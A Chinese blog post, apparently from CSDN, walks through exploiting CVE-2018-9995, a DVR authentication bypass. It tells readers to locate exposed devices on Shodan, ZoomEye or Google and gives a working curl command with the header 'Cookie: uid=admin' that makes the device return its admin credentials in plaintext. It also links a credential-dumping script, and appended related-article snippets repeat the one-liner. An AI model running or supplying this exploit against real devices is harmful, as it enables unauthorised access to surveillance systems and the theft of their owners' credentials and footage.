CVE-2018-9995--攻击网络硬盘录像机(DVR)

最新推荐文章于 2024-08-22 08:20:41 发布
最新推荐文章于 2024-08-22 08:20:41 发布
阅读量3.7k 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mouseleoz/article/details/80203539
版权

漏洞编号:CVE-2018-9995

发现时间:2018-4

影响范围tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL

漏洞描述

   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。

   最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。

   最开始研究员发现CVE-2018-9995仅影响由TBK制造的DVR设备,但接下来发现,由其他供应商的产品同样受到影响,包括但不限于:Novo、cenova、qseepulnix、night owl。

漏洞利用:

       (因为笔者第一次写类似这种博客类东西,所以可能会有不完善的地方,尽量描述清楚)        

        1.  首先要确定目标。这里提供几个搜索引擎,国内的zoomeye、国外的shodan、以及谷歌(需要翻墙),按照关键字搜索都可以,相比较而言,笔者觉得可能shodan更好用,这里就以shodan和谷歌为例,搜索关键字如下:



        2. 通过构造的链接命令查看是否DVR有返回消息

      root# curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" && echo ""

        如有返回消息,则可以直接得到登录账号密码。

        3.通过脚本的方式获取账号密码

       该脚本在原作者的GitHub上有,笔者也分享给大家:https://github.com/ezelf/CVE-2018-9995_dvr_credentials#help

        4. 效果展示


mouseleoz
关注
专栏目录
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1352
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
CVE-2018-9995摄像头
haha1314的博客
07-15 1429
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。 二、复现过程 1、搜索引擎搜索使用DVR设备的网站或服务器 Shodan/zoomeye: “GNU rsp/1.0” 或 ...
探索CVE-2018-9995 DVR凭证泄漏:一个安全研究与防护的宝贵资源
gitblog_00073的博客
04-17 315
探索CVE-2018-9995 DVR凭证泄漏:一个安全研究与防护的宝贵资源 CVE-2018-9995_dvr_credentials(CVE-2018-9995) Get DVR Credentials项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2018-9995_dvr_credentials 项目简介 在的开源项目。这个项目是由Ezelf贡献的,...
海康摄像头CVE-2021-36260漏洞复现
heike_Ch的博客
06-25 1221
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
DVR登录绕过漏洞(CVE-2018-9995)
weixin_30335575的博客
05-09 584
###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ez...
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3026
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
3. CVE-2018-15919:这是一个输入验证错误,可能导致拒绝服务(DoS)攻击。当OpenSSH处理特殊构造的请求时,可能会耗尽系统资源,导致服务不可用。 为了修复这些漏洞,我们需要将OpenSSH升级到最新的稳定版本。在这...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
描述中提到"[Tool] show DVR Credentials",表明这个压缩包可能包含一个工具,用于展示通过CVE-2018-9995漏洞获取的数字视频录像机(DVR)的凭证信息。"Shodan"是一个网络搜索引擎,专门用于查找互联网上的各种联网...
CVE-2018-3191利用exp
01-08
为了利用CVE-2018-3191,攻击者可能首先会通过网络扫描来定位易受攻击的WebLogic服务器。一旦找到目标,他们可能会发送特制的HTTP请求,这些请求包含能够触发漏洞的序列化数据。如果服务器没有正确配置安全更新或...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
DVR登录绕过漏洞_CVE-2018-9995漏洞复现
WY92139010的博客
06-30 1342
DVR登录绕过漏洞_CVE-2018-9995漏洞复现 一、漏洞描述 此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。 二、影响软件以及版本 Novo CeNova QSee Pulnix XVR 5 in 1 (title: "XVR Login") Securus, - Security. Nev...
java虚拟机绕过,DVR登录绕过漏洞(CVE-2018-9995)
weixin_31302909的博客
03-16 564
###漏洞描述此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。###漏洞利用1.利用代码curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"2.poc利用https://github.com/ezelf/CVE-2018-9995_...
cve-2018-9995 dvr登录绕过漏洞
weixin_34311757的博客
06-04 338
本帖最后由 Snow狼 于 2018-6-4 10:27 编辑 dvr登录绕过漏洞此漏洞允许×××者构造一个cookie即可登录漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"测试有此漏洞的dvr:NovoCeNovoQSeePulnix ...
【漏洞复现】 CVE-2018-9995 DVR登陆绕过漏洞
weixin_34097242的博客
07-06 431
漏洞描述 类别:访问控制失效。访问DVR系列产品的WEB端时,设置如下cookie:uid=admin可绕过访问控制,获取设备内的用户名及登陆凭证。 漏洞利用 curl "http://ip:port/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" EXP git clone https://github.com/exexute/E...
CVE-2018-9995_dvr_credentials 项目使用教程
最新发布
gitblog_01016的博客
08-22 349
CVE-2018-9995_dvr_credentials 项目使用教程 CVE-2018-9995_dvr_credentials(CVE-2018-9995) Get DVR Credentials项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2018-9995_dvr_credentials 1. 项目的目录结构及介绍 CVE-2018-9995_d...
黑客正在利用 TBK DVR 设备中五年未修复的 0day
smellycat000的专栏
05-04 717
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士FortiGuard Labs 发布安全公告指出,威胁行动者们正在利用影响 TBK 数字化视频记录 (DVR) 设备的一个未修复漏洞 (CVE-2018-9995)。该漏洞已存在五年之久。CVE-2018-9995的CVSS 评分为9.8,是一个认证绕过漏洞,可被远程攻击者用于提升权限。Fortinet 在5月1日发布的文章中剃刀,“该已存在五年...
CVE-2019-9995复现并改写exp
Seizerz的博客
09-06 784
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取...
CVE-2018-8034
07-28
CVE-2018-8034是一个与Apache Tomcat相关的漏洞。根据提供的引用内容,我无法找到与CVE-2018-8034直接相关的信息。请提供更多关于CVE-2018-8034的信息,以便我能够为您提供准确的答案。 #### 引用[.reference_title] - *1* [windows Server 2012 R2扫描漏洞处理(CVE-2018-0886,CVE-2016-2183,CVE-2013-2566,CVE-2015-2808)](https://blog.csdn.net/weixin_39945506/article/details/119863457)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [常见主机漏洞](https://blog.csdn.net/weixin_45849370/article/details/102956932)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值